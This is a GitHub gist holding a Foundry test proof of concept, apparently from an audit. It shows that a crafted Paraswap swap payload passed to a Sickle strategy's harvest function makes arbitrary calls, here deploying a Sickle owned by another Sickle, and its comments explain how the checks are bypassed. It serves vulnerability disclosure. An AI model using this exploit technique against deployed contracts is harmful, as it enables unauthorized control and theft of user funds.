-
-
Save DrasticWatermelon/20fb2c38e1a90f38a8901d946ec8dd72 to your computer and use it in GitHub Desktop.
ArbitraryCallPoC.sol
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
1. Add the test case to `test/strategies/PrismaConnector.t.sol` | |
2. Execute with `forge t --mt test_ArbitraryCallPOC -vvv` | |
At the end, the test asserts that the user's Sickle is now an owner of a Sickle |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
function test_ArbitraryCallPOC() external prank { | |
CurvePool[] memory curvePools = getCurvePools(); | |
whitelistCurve(curvePools); | |
vm.startPrank(sickleOwner); | |
ParaswapExtraData memory payload = ParaswapExtraData({ | |
target: address(ctx.factory), | |
data: abi.encodeCall(SickleFactory.deploy, (address(0xdeadbeef), bytes32(hex"abcdabcd"))) | |
}); | |
// 1. Create call params to target ParaswapConnector | |
SwapData[] memory swap = new SwapData[](1); | |
swap[0] = SwapData({ | |
router: Mainnet.PARASWAP_TOKEN_TRANSFER_PROXY, | |
tokenIn: Mainnet.WETH, // AUDIT not important | |
amountIn: 1, // AUDIT needs to bypass 0 zero | |
minAmountOut: 0, // AUDIT not important | |
extraData: abi.encode(payload) | |
}); | |
ZapModule.ZapOutData memory zapData = ZapModule.ZapOutData({ | |
removeLiquidityData: RemoveLiquidityData({ | |
router: address(0), | |
lpToken: address(0), | |
tokens: new address[](0), | |
lpAmountIn: 0, | |
minAmountsOut: new uint256[](0), | |
extraData: "" | |
}), | |
swaps: swap, // TODO this is important for the exploit | |
tokenOut: ETH | |
}); | |
// 2. Execute farmStrategy.harvest(pool, harvestData, "") | |
farmStrategy.harvest( | |
curvePools[0].pool, // AUDIT sets a random, registered, target to bypass connector existence check | |
zapData, | |
"" | |
); | |
// 3. Verify the Sickle is owner of a Sickle | |
address usersSickle = ctx.factory.sickles(sickleOwner); | |
assertTrue(usersSickle != address(0), "User isn't admin of a sickle"); | |
address sicklesSickle = ctx.factory.sickles(usersSickle); | |
assertTrue(sicklesSickle != address(0), "Sickles isn't admin of a sickle"); | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment